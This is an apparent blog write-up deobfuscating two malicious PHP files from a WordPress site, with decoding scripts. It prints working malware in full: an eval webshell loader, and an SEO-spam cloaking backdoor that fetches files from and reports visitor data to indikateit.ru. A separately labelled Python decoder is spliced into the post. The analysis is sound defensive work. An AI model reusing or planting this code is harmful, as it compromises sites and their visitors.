TL;DR: A colleague sent me two 'malicious PHP' files he found on his WordPress website. I detail below how I deobfuscated the malicious code and found their domain which they post information to: indikateit.ru
Today, my colleague messaged me whilst I was on my commute to work, asking me to take a look at a 'potentially malicious' PHP file which he had found on his personal website.
The code was:
<?php
$anthropological= '$ii'; $former= 'e';$bach = 'BiTT(?U';$encumbers = ']s_(S]w)$'; $cards = 'Qac';$invokes ='K';
$lagging = '_';
$cautioned =']'; $evensong = '1d4_'; $blustering= '4[e';$besmirch = ' ,fp)a;';$lemma = 'aA';$indicter= 'as)/EvtSd';$cantankerously = 't'; $espoused='uCtEPOqa';$investigation = 'r';$juicy ='7r'; $desmond= ')';$countermeasure='_';$indemnify = 'lQOV';
$injections ='lye'; $backarrows ='r';$gaillardia='@';$lime ='Z,';$apprentice= 'g'; $captains ='R';$blameworthy = ')tL"';$dragnet = 's';
$evicting= ')'; $cleaved ='<(I'; $cap = '@$eqo$_Q[';
$corroborating = 're'; $enemas= 'a'; $data='9'; $hetty = '_'; $buttocks ='?';
$lambert='gsad)';$hinze='d'; $infra= 'e';
$glib= 'e0U6A__dP';$evades='e';$bandies='d';$barret = '8["uXDa(v';$broach= 'Tn'; $impetuous= '"i';$clari='i';$bren = 'bI$'; $iceberg= '"';$cheetah= '='; $haydon = 't_u';$he= ':,ascna":';$insights='eHl';
$fanni='_';$heeded ='gaG'; $cranberry= 'L';$drench = 'vfi;udf-b'; $devin= '_';$lumps= 'J';$bunkhouse= '[UKRTi?CN'; $brutality =')wD'; $contaminates= 't';
$astronomer= 'r$'; $leavened ='a'; $logicians= 'VrD+)(^';$catlaina= 'H';$annihilation=']TH';$indeed ='eW:'; $animadvert= 'MoW;r';$extrude = 'E'; $bobafett ='tc>Ql';
$collection='o'; $blest = 'acYi*r'; $franco= ';';$farmer= '2'; $avenue = 'rs';$angelle ='"L)';
$fornication ='cd(.=e';$junkerdom = 'mE]$R$['; $kyle ='$';$flapping ='n'; $dialup= 'e';$javelins='Re(e(=@s';
$consider='W'; $headache ='5ADvrUs';$counsellors= 'T';
$ewoks= 'b'; $bellies =')';$kippie = ')bO';$basalt='FBEa';$colorers= 'r'; $duane ='_'; $jeremiah ='6(yD$3(E';$exterminated= '"pe"';$bungled='ie;(P`@';
$chrysler ='BS'; $gnni = $fornication['0'] .
$colorers . $bungled['1'] .$basalt['3'] . $bobafett['0'] . $bungled['1'] .$duane.$drench['6']. $drench['4'].$flapping .$fornication['0'] . $bobafett['0'] .$bungled[0]. $collection .$flapping;
$cracking=$besmirch['0'] ;$flowcharting= $gnni($cracking, $bungled['1'] . $headache['3'] .$basalt['3'] . $bobafett['4'] .$bungled['3'].$bungled['6'].$basalt['3'] . $colorers.$colorers. $basalt['3']. $jeremiah['2'].$duane. $exterminated['1']. $collection.
$exterminated['1'].
$bungled['3']. $drench['6'].
$drench['4'] .$flapping.
$fornication['0'] . $duane . $heeded['0'] .$bungled['1'] . $bobafett['0'] . $duane .$basalt['3'].$colorers .$heeded['0'] . $headache['6'] . $bungled['3'].$kippie[0]. $kippie[0] . $kippie[0]. $bungled['2'] );
$flowcharting($cap['3'] ,$exterminated['1'], $drench['7'], $animadvert['0'] ,$bungled['1'] ,
$indicter['3'],$jeremiah['4'].$bungled[0]. $javelins['5'] .$bungled['6'].
$basalt['3']. $colorers . $colorers. $basalt['3'].$jeremiah['2']. $duane. $junkerdom['0'] .$bungled['1']. $colorers.$heeded['0'] . $bungled['1']. $bungled['3'] . $jeremiah['4']. $duane .
$javelins['0']. $jeremiah['7'].$bobafett[3].$headache['5'] . $jeremiah['7'] .$chrysler['1'].$counsellors .$he['1'].$jeremiah['4'] .
$duane . $bunkhouse[7] .
$kippie['2'] .$kippie['2'] . $bunkhouse['2'] .$bren['1'] .
$jeremiah['7'].$he['1'] . $jeremiah['4'] . $duane .$chrysler['1'] .$jeremiah['7'] . $javelins['0']. $logicians['0'].$jeremiah['7'].$javelins['0'].
$kippie[0] .$bungled['2'].$jeremiah['4'].$basalt['3'] .$javelins['5'].$bungled[0].$headache['6'] . $headache['6'] . $bungled['1'] . $bobafett['0'] . $bungled['3'] .$jeremiah['4']. $bungled[0]. $junkerdom['6']. $exterminated[3].$brutality['1'] .$bobafett['4'] .$cap['3'] .
$basalt['3'] .
$drench['4'] .$fornication['1'] .
$fornication['1'] .$kippie['1'] .$exterminated[3] .
$junkerdom['2'].$kippie[0].
$bunkhouse['6'] . $jeremiah['4'].$bungled[0].$junkerdom['6']. $exterminated[3] .
$brutality['1'] .$bobafett['4'] . $cap['3'].$basalt['3'] .$drench['4'].
$fornication['1'] . $fornication['1'] .$kippie['1'] .$exterminated[3].$junkerdom['2'].
$indeed['2'].
$bungled['3']. $bungled[0] .$headache['6'] . $headache['6'] . $bungled['1'] .$bobafett['0'].$bungled['3'].
$jeremiah['4'].$bungled[0].
$junkerdom['6'] .$exterminated[3]. $annihilation['2'].$counsellors .
$counsellors .$bungled['4'] .$duane . $consider.$angelle['1'] .$bobafett[3] .$headache['1']. $headache['5'] .
$jeremiah['3'].$jeremiah['3']. $chrysler['0'] .$exterminated[3] .
$junkerdom['2'] .
$kippie[0]. $bunkhouse['6'] . $jeremiah['4'] . $bungled[0] . $junkerdom['6']. $exterminated[3].$annihilation['2'] . $counsellors. $counsellors.$bungled['4'] .
$duane . $consider. $angelle['1'].
$bobafett[3].
$headache['1']. $headache['5'].$jeremiah['3'].$jeremiah['3'].$chrysler['0'] . $exterminated[3] .
$junkerdom['2']. $indeed['2']. $fornication['1'] . $bungled[0] . $bungled['1'] .$kippie[0] . $bungled['2'] .
$bungled['6'].$bungled['1'].
$headache['3'] .$basalt['3'].$bobafett['4'].$bungled['3'].$headache['6'] . $bobafett['0'] . $colorers.$colorers .$bungled['1'].$headache['3'] . $bungled['3'] .
$kippie['1'] . $basalt['3'].$headache['6'] .$bungled['1'] .$jeremiah['0'] .
$blustering['0']. $duane.
$fornication['1'].$bungled['1'] .$fornication['0'] .$collection .$fornication['1'].$bungled['1'].
$bungled['3'] .
$headache['6']. $bobafett['0'] . $colorers.$colorers .$bungled['1'].
$headache['3'] . $bungled['3']. $jeremiah['4'].
$basalt['3'] .
$kippie[0] . $kippie[0] .$kippie[0]. $kippie[0] .$bungled['2']);
My first thought was to Google search the filename, which was oqjpuqbi.php.
Nothing came up.
I then googled the file content itself.
Nothing came up.
I realised that the code was probably randomised, so if someone had the same code it would have different variable names, and variables which pointed to different strings.
My first thoughts were to try an online php deobfuscation tool.
This helped space things out but the strange variables, e.g. bobafett, enemas & fornication, still remained.
It was clear that these variables referenced strings, which would then be concatenated together to form instructions, potentially malicious instructions.
I then copy-pasted this more readable and spaced-out PHP code into vim, used some regex to transform the PHP syntax into JavaScript, then made sure that the JavaScript that I would then run in my browser console was just limited to printing concatenated strings.
This is the resulting code which I would run:
var anthropological='ii';
var former='e';
var bach='BiTT(?U';
var encumbers=']s_(S]w)';
var cards='Qac';
var invokes='K';
var lagging='_';
var cautioned=']';
var evensong='1d4_';
var blustering='4[e';
var besmirch=' ,fp)a;';
var lemma='aA';
var indicter='as)/EvtSd';
var cantankerously='t';
var espoused='uCtEPOqa';
var investigation='r';
var juicy='7r';
var desmond=')';
var countermeasure='_';
var indemnify='lQOV';
var injections='lye';
var backarrows='r';
var gaillardia='@';
var lime='Z,';
var apprentice='g';
var captains='R';
var blameworthy=')tL"';
var dragnet='s';
var evicting=')';
var cleaved='<(I';
var cap='@eqo_Q[';
var corroborating='re';
var enemas='a';
var data='9';
var hetty='_';
var buttocks='?';
var lambert='gsad)';
var hinze='d';
var infra='e';
var glib='e0U6A__dP';
var evades='e';
var bandies='d';
var barret='8["uXDa(v';
var broach='Tn';
var impetuous='"i';
var clari='i';
var bren='bI';
var iceberg='"';
var cheetah='=';
var haydon='t_u';
var he=':,ascna":';
var insights='eHl';
var fanni='_';
var heeded='gaG';
var cranberry='L';
var drench='vfi;udf-b';
var devin='_';
var lumps='J';
var bunkhouse='[UKRTi?CN';
var brutality=')wD';
var contaminates='t';
var astronomer='r';
var leavened='a';
var logicians='VrD+)(^';
var catlaina='H';
var annihilation=']TH';
var indeed='eW:';
var animadvert='MoW;r';
var extrude='E';
var bobafett='tc>Ql';
var collection='o';
var blest='acYi*r';
var franco=';';
var farmer='2';
var avenue='rs';
var angelle='"L)';
var fornication='cd(.=e';
var junkerdom='mE]R[';
var kyle='';
var flapping='n';
var dialup='e';
var javelins='Re(e(=@s';
var consider='W';
var headache='5ADvrUs';
var counsellors='T';
var ewoks='b';
var bellies=')';
var kippie=')bO';
var basalt='FBEa';
var colorers='r';
var duane='_';
var jeremiah='6(yD3(E';
var exterminated='"pe"';
var bungled='ie;(P`@';
var chrysler='BS';
var gnni= fornication[0] + colorers + bungled[1] + basalt[3] + bobafett[0] + bungled[1] + duane + drench[6] + drench[4] + flapping + fornication[0] + bobafett[0] + bungled[0] + collection + flapping;
cracking=besmirch[0];
//flowcharting=gnni(cracking,bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+exterminated[1]+collection+exterminated[1]+bungled[3]+drench[6]+drench[4]+flapping+fornication[0]+duane+heeded[0]+bungled[1]+bobafett[0]+duane+basalt[3]+colorers+heeded[0]+headache[6]+bungled[3]+kippie[0]+kippie[0]+kippie[0]+bungled[2]);
var another_string = bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+exterminated[1]+collection+exterminated[1]+bungled[3]+drench[6]+drench[4]+flapping+fornication[0]+duane+heeded[0]+bungled[1]+bobafett[0]+duane+basalt[3]+colorers+heeded[0]+headache[6]+bungled[3]+kippie[0]+kippie[0]+kippie[0]+bungled[2];
console.log(`another_string is ${another_string}`);
var finalStr = cap[3]+exterminated[1]+drench[7]+animadvert[0]+bungled[1]+indicter[3]+jeremiah[4]+bungled[0]+javelins[5]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+junkerdom[0]+bungled[1]+colorers+heeded[0]+bungled[1]+bungled[3]+jeremiah[4]+duane+javelins[0]+jeremiah[7]+bobafett[3]+headache[5]+jeremiah[7]+chrysler[1]+counsellors+he[1]+jeremiah[4]+duane+bunkhouse[7]+kippie[2]+kippie[2]+bunkhouse[2]+bren[1]+jeremiah[7]+he[1]+jeremiah[4]+duane+chrysler[1]+jeremiah[7]+javelins[0]+logicians[0]+jeremiah[7]+javelins[0]+kippie[0]+bungled[2]+jeremiah[4]+basalt[3]+javelins[5]+bungled[0]+headache[6]+headache[6]+bungled[1]+bobafett[0]+bungled[3]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+brutality[1]+bobafett[4]+cap[3]+basalt[3]+drench[4]+fornication[1]+fornication[1]+kippie[1]+exterminated[3]+junkerdom[2]+kippie[0]+bunkhouse[6]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+brutality[1]+bobafett[4]+cap[3]+basalt[3]+drench[4]+fornication[1]+fornication[1]+kippie[1]+exterminated[3]+junkerdom[2]+indeed[2]+bungled[3]+bungled[0]+headache[6]+headache[6]+bungled[1]+bobafett[0]+bungled[3]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+annihilation[2]+counsellors+counsellors+bungled[4]+duane+consider+angelle[1]+bobafett[3]+headache[1]+headache[5]+jeremiah[3]+jeremiah[3]+chrysler[0]+exterminated[3]+junkerdom[2]+kippie[0]+bunkhouse[6]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+annihilation[2]+counsellors+counsellors+bungled[4]+duane+consider+angelle[1]+bobafett[3]+headache[1]+headache[5]+jeremiah[3]+jeremiah[3]+chrysler[0]+exterminated[3]+junkerdom[2]+indeed[2]+fornication[1]+bungled[0]+bungled[1]+kippie[0]+bungled[2]+bungled[6]+bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+headache[6]+bobafett[0]+colorers+colorers+bungled[1]+headache[3]+bungled[3]+kippie[1]+basalt[3]+headache[6]+bungled[1]+jeremiah[0]+blustering[0]+duane+fornication[1]+bungled[1]+fornication[0]+collection+fornication[1]+bungled[1]+bungled[3]+headache[6]+bobafett[0]+colorers+colorers+bungled[1]+headache[3]+bungled[3]+jeremiah[4]+basalt[3]+kippie[0]+kippie[0]+kippie[0]+kippie[0]+bungled[2];
console.log(`final str is ${finalStr}`);
What got logged out was:
another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_RundefinedQUundefinedST,3_COOKIundefined,3_SundefinedRVundefinedR);3a=isset(3iundefined"wloauddb"])?3iundefined"wloauddb"]:(isset(3iundefined"HTTP_WLQAUDDB"])?3iundefined"HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
Immediately, I noticed the undefined in the string which was logged.
Upon a review of the code, I realized that the alleged malicious actor had made a mistake: jeremiah[7] returns null because it is of length 7 and hence it cannot index something which does not exist.
I then appended the last character once more to jeremiah to make sure it was length 7, then ran in my browser again.
The output this time was:
another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_REQUEST,3_COOKIE,3_SERVER);3a=isset(3iundefined"wloauddb"])?3iundefined"wloauddb"]:(isset(3iundefined"HTTP_WLQAUDDB"])?3iundefined"HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
Now this looked a lot better. rubs hands
As you can see, there is now another undefined outputted.
This is from the junkerdom, which is of length 5, yet the code is asking for a character at index 6.
This is clearly supposed to be another square bracket, namely, [.
When fixed, the output is:
another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_REQUEST,3_COOKIE,3_SERVER);3a=isset(3i["wloauddb"])?3i["wloauddb"]:(isset(3i["HTTP_WLQAUDDB"])?3i["HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
This looks a lot better.
At the end of the above output, it string reverses 3a -> a3 then base64 decodes it which gives k.
Update: my friend gave me another file he found on his website named goldafunder.php. A Google search of this filename presented no results.
This was the file:
<?php $PZOGngRGYdWpGi="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB";$wzEaCfiPhwFdUF=$PZOGngRGYdWpGi[4] .$PZOGngRGYdWpGi[45]. $PZOGngRGYdWpGi[30]. $PZOGngRGYdWpGi[24]. $PZOGngRGYdWpGi[21] .$PZOGngRGYdWpGi[2] .$PZOGngRGYdWpGi[11] .$PZOGngRGYdWpGi[44] .$PZOGngRGYdWpGi[24].
$PZOGngRGYdWpGi[52]. $PZOGngRGYdWpGi[57] .$PZOGngRGYdWpGi[44].$PZOGngRGYdWpGi[24];$xWqBnKmIZCRbJ=$PZOGngRGYdWpGi[30]. $PZOGngRGYdWpGi[53]. $PZOGngRGYdWpGi[20] .$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[24] .$PZOGngRGYdWpGi[41];$IUCaEKgNOPd=$PZOGngRGYdWpGi[24].
$PZOGngRGYdWpGi[20] .$PZOGngRGYdWpGi[20] . $PZOGngRGYdWpGi[57].
$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[11].$PZOGngRGYdWpGi[20].$PZOGngRGYdWpGi[24]. $PZOGngRGYdWpGi[56] .$PZOGngRGYdWpGi[57] .$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[53] .$PZOGngRGYdWpGi[39] .$PZOGngRGYdWpGi[38]. $PZOGngRGYdWpGi[23];$TiCkLZuka=$PZOGngRGYdWpGi[52] .$PZOGngRGYdWpGi[20].
$PZOGngRGYdWpGi[24] .$PZOGngRGYdWpGi[45] . $PZOGngRGYdWpGi[53] .$PZOGngRGYdWpGi[24] .$PZOGngRGYdWpGi[11]. $PZOGngRGYdWpGi[33] .$PZOGngRGYdWpGi[35] . $PZOGngRGYdWpGi[38]. $PZOGngRGYdWpGi[52]. $PZOGngRGYdWpGi[53].$PZOGngRGYdWpGi[39] .$PZOGngRGYdWpGi[57].$PZOGngRGYdWpGi[38];$IUCaEKgNOPd(0);$HTIRyzRYNNT=$TiCkLZuka("",$wzEaCfiPhwFdUF($xWqBnKmIZCRbJ("")));$HTIRyzRYNNT();?>
Now, to me, that last line looks like it contains some base64 string.
Upon decoding the last large base64 string ("K0...QC"), I got a binary (maybe).
I must now attempt to deobfuscate goldafunder.php to bring meaning to the base64 encoded text.
After transforming the original PHP file into something resembling JavaScript:
var randomText="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB";
var firstText=randomText[4]+randomText[45]+randomText[30]+randomText[24]+randomText[21]+randomText[2]+randomText[11]+randomText[44]+randomText[24]+randomText[52]+randomText[57]+randomText[44]+randomText[24];
var secondText=randomText[30]+randomText[53]+randomText[20]+randomText[20]+randomText[24]+randomText[41];
var thirdText=randomText[24]+randomText[20]+randomText[20]+randomText[57]+randomText[20]+randomText[11]+randomText[20]+randomText[24]+randomText[56]+randomText[57]+randomText[20]+randomText[53]+randomText[39]+randomText[38]+randomText[23];
var fourthText=randomText[52]+randomText[20]+randomText[24]+randomText[45]+randomText[53]+randomText[24]+randomText[11]+randomText[33]+randomText[35]+randomText[38]+randomText[52]+randomText[53]+randomText[39]+randomText[57]+randomText[38];
// The calls from the PHP original stay commented out: in JavaScript these variables are plain strings, not callable names.
// thirdText(0); var fifthText=fourthText("",firstText(secondText(""))); fifthText();
console.log(firstText); console.log(secondText); console.log(thirdText);
After console.logging firstText, secondText, and thirdText I got:
base64_decode
strrev
error_reporting
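An added example, not part of the original post: a small static resolver for the string-table obfuscation used in both files, written in Python so the PHP is never executed. The table excerpts and expressions are copied from the two samples above; the function names (parse_table, resolve, strip_dollars, decode_samples) are this example's own. It reads each literal verbatim, `$` included (PHP does not interpolate inside single quotes), and raises on an out-of-range index instead of yielding undefined.

```python
import re

# `$name = 'literal';` or `$name="literal";`. Escapes and interpolation are not
# handled; the literals in both samples are plain.
ASSIGN_RE = re.compile(r"""\$(\w+)\s*=\s*(['"])((?:(?!\2).)*)\2\s*;""", re.S)
# One concatenation operand: `$name`, `$name[3]` or `$name['3']`.
TERM_RE = re.compile(r"""\$(\w+)(?:\[\s*['"]?(\d+)['"]?\s*\])?""")

# Excerpt of the first file's table (only the entries the expressions below use).
SAMPLE_1_TABLE = r'''
$fornication ='cd(.=e';$junkerdom = 'mE]$R$['; $flapping ='n';
$javelins='Re(e(=@s'; $headache ='5ADvrUs';$counsellors= 'T';
$basalt='FBEa';$colorers= 'r'; $duane ='_'; $jeremiah ='6(yD$3(E';
$bungled='ie;(P`@'; $chrysler ='BS'; $heeded ='gaG';
$drench = 'vfi;udf-b'; $bobafett ='tc>Ql'; $collection='o';
'''
# The expression assigned to $gnni, the first function name the loader builds.
SAMPLE_1_HELPER = r'''$fornication['0'] . $colorers . $bungled['1'] .$basalt['3'] .
$bobafett['0'] . $bungled['1'] .$duane.$drench['6']. $drench['4'].$flapping .
$fornication['0'] . $bobafett['0'] .$bungled[0]. $collection .$flapping'''
# Opening terms of the long payload string in the first file.
SAMPLE_1_PAYLOAD = r'''$jeremiah['4'].$bungled[0]. $javelins['5'] .$bungled['6'].
$basalt['3']. $colorers . $colorers. $basalt['3'].$jeremiah['2']. $duane.
$junkerdom['0'] .$bungled['1']. $colorers.$heeded['0'] . $bungled['1'].
$bungled['3'] . $jeremiah['4']. $duane . $javelins['0']. $jeremiah['7'].
$bobafett[3].$headache['5'] . $jeremiah['7'] .$chrysler['1'].$counsellors'''
# A later run of terms from the same payload that indexes $junkerdom['6'].
SAMPLE_1_ISSET = r'''$bungled[0].$headache['6'] . $headache['6'] . $bungled['1'] .
$bobafett['0'] . $bungled['3'] .$jeremiah['4']. $bungled[0]. $junkerdom['6']'''

# Second file: its single table string and the expression assigned to $TiCkLZuka.
SAMPLE_2_TABLE = r'''$PZOGngRGYdWpGi="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB";'''
SAMPLE_2_EXPR = r'''$PZOGngRGYdWpGi[52] .$PZOGngRGYdWpGi[20].
$PZOGngRGYdWpGi[24] .$PZOGngRGYdWpGi[45] . $PZOGngRGYdWpGi[53] .$PZOGngRGYdWpGi[24] .
$PZOGngRGYdWpGi[11]. $PZOGngRGYdWpGi[33] .$PZOGngRGYdWpGi[35] . $PZOGngRGYdWpGi[38].
$PZOGngRGYdWpGi[52]. $PZOGngRGYdWpGi[53].$PZOGngRGYdWpGi[39] .$PZOGngRGYdWpGi[57].
$PZOGngRGYdWpGi[38]'''


def parse_table(php_src):
    """Collect `$name = 'literal';` assignments without executing anything."""
    return {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(php_src)}


def resolve(expr, table):
    """Evaluate a pure `$a[1] . $b . $c['2']` concatenation against the table."""
    out = []
    for m in TERM_RE.finditer(expr):
        name, idx = m.group(1), m.group(2)
        if name not in table:
            raise LookupError(f"${name} is not in the table")
        value = table[name]
        if idx is None:
            out.append(value)          # whole-string operand
        elif int(idx) < len(value):
            out.append(value[int(idx)])
        else:
            raise IndexError(f"${name}[{idx}] is past the end of {value!r}")
    return "".join(out)


def strip_dollars(table):
    """Model a conversion that drops `$` from the literals as well as the names."""
    return {name: value.replace("$", "") for name, value in table.items()}


def decode_samples():
    """Resolve every constructed excerpt and report what each one spells."""
    t1, t2 = parse_table(SAMPLE_1_TABLE), parse_table(SAMPLE_2_TABLE)
    decoded = {
        "sample1_helper": resolve(SAMPLE_1_HELPER, t1),
        "sample1_payload_start": resolve(SAMPLE_1_PAYLOAD, t1),
        "sample1_isset": resolve(SAMPLE_1_ISSET, t1),
        "sample2_helper": resolve(SAMPLE_2_EXPR, t2),
    }
    try:
        resolve(SAMPLE_1_PAYLOAD, strip_dollars(t1))
        decoded["stripped_table"] = "resolved"
    except IndexError as exc:
        # Shorter literals shift every later index and push the last one off the end.
        decoded["stripped_table"] = str(exc)
    return decoded


if __name__ == "__main__":
    for label, text in decode_samples().items():
        print(f"{label}: {text}")
```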
Looking back at the code, I then realized the original base64 encoded string I first looked at was string reversed!
Here is the unreversed version:

If I base64 decode this I get:
set_time_limit(0);
function get_val($a0){
$i=@array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["$a0"])?$i["$a0"]:(isset($i["HTTP_".strtoupper($a0)])?$i["HTTP_".strtoupper($a0)]:"");
return $a;
}
function change_page_regex($page, $links,$reg,$res){
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
$elements = array_unique($elements);
}
$m=min(count($links),count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
if (count($links)>0){
$element = "<p>";
$element .= implode("<br>\n", $links);
$element .= "</p>";
$page = preg_replace('/\<\/body\>/i', "\n" . $element . "\n$0", $page, 1);
}
return $page;
}
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1312.213 Safari/537.36"){
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec ($ch);
$curly_page_get_info=curl_getinfo($ch);
curl_close($ch);
return array($result,$curly_page_get_info);
}
function get_proxy_page($phead=1){
$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
list($buf,$curly_page_get_info)=curly_page_get($crurl);
$ct=@$curly_page_get_info['content_type'];
$nexturl=@$curly_page_get_info['redirect_url'];
$status=@$curly_page_get_info['http_code'];
if (status!="")header("Status: $status");
if ($phead)header("X-CF-RAYX: ".substr(md5(time()),0,10));
if ($ct!=""){
header("Content-type: $ct");
}
if ($nexturl!=""){
header("Location: $nexturl");
}
return array($buf,$ct);
}
function get_db_path(){
if (stristr(PHP_OS,"win")){
return sys_get_temp_dir();
}
$default_dirs = array(
'wp-includes/SimplePie/Content',
'wp-includes/js/tinymce/plugins',
'wp-content/plugins/akismet/_inc/img',
'administrator/components/com_media/views/images',
'libraries/cms/html/language',
'media/editors/tinymce/js/plugins',
'tmp',
'wp-content/uploads'
);
foreach ($default_dirs as $d) if (is_dir($d) && is_writable($d)) return ($d);
$current_dir = opendir('.');
while ($dir = readdir($current_dir)) if (!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir)) return ($dir);
closedir($current_dir);
if (is_writable('.')) return ('.');
$tmp_dir = sys_get_temp_dir();
if (is_dir($tmp_dir) && is_writable($tmp_dir)) return $tmp_dir;
return ".";
}
$content="";
$x=get_val("pppp_check");
$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=strtolower(@$_SERVER["HTTP_HOST"]);
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);$urx=$host.$uri;$md5urx=md5($urx);
$xmd5="/.".$md5host."/";
$cfile="emoji1.png";
if (!@file_exists(".".$xmd5.$cfile)){
$tmppath=get_db_path();
}else{
$tmppath=".";
}
$tmppath=$tmppath.$xmd5;@mkdir($tmppath);
$configs=$tmppath.$cfile;
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";
@ini_set('memory_limit','1600M');
$domain=base64_decode("aW5kaWthdGVpdC5ydQ==");
$p="";
if ($x!="")$p=md5(@base64_decode(get_val("p")));
if (($x!="")&&($p==$md5pass)){
if ($x=="2"){
echo "###UPDATING_FILES###\n";
$ur="http://".$domain."/images/".$md5host."/";
list($buf1,$t)=@curly_page_get($ur."emoji1.png");@file_put_contents($configs,$buf1);
list($buf1,$t)=@curly_page_get($ur."metaicons.jpg");@file_put_contents($bd,$buf1);
list($buf1,$t)=@curly_page_get($ur."wp-themesall.gif");@file_put_contents($templ,$buf1);
echo "###UPDATED###\n";
exit;
}
if ($x=="4"){
echo "###WORKED###\n";exit;
}
if ($x=="5"){
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(@base64_decode(@file_get_contents($configs)));
}
$out=array(
'cf' => $cf,
'server' => $_SERVER,
'file' => __FILE__,
'configfile' => $configs,
'db_file_size' => is_file($bd) ? filesize($bd) : 0,
'template_file_size' => is_file($templ) ? filesize($templ) : 0,
);
echo base64_encode(serialize($out));
exit;
}
}else{
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(@base64_decode(@file_get_contents($configs)));
}
if (@isset($cf[$md5urx])){
$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
$off=$cf[$md5urx]+0;
$template=@base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f));@fclose($f);$info=unserialize(base64_decode($buf));
$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
if ($bot) {
if (isset($info["contenttype"])){$contenttype=@base64_decode($info["contenttype"]);$types=explode("\n",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
if (isset($info["isdoor"])){
if (isset($info["standalone"])){
$doorcontent=base64_decode($text);
echo $doorcontent;exit;
}else{
if ((isset($info["nr"]))&&(is_array($info["nr"]))){
foreach($info["nr"] as $mark => $repl){
$template=str_replace($mark,$repl,$template);
}
}else{
$template=str_replace("%text%",$text,$template);
$template=str_replace("%title%",$title,$template);
$template=str_replace("%description%",$description,$template);
$template=str_replace("%uckeyword%",$uckeyword,$template);
$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
foreach($inside_links as $i => $link){
$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
}
}
echo $template;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
if (stristr($ct,"text/html")){
$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
$links=$info["links_a"];
$buf=change_page_regex($buf,$links,$rega,$resa);
$regp='/(.{30}\<\/p\>)/is';$resp=1;
$links=$info["links_p"];
$buf=change_page_regex($buf,$links,$regp,$resp);
}
echo $buf;exit;
}
}
if ($se) {
if (isset($info["isdoor"])){
list($buf,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
}else{
list($buf,$ct)=get_proxy_page();
}
echo $buf;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;exit;
}
}
Immediately, I notice $domain, which is a base64-encoded string that, when decoded, gives:
indikateit.ru
I'm guessing this is the server which the allegedly malicious scripts post information to.
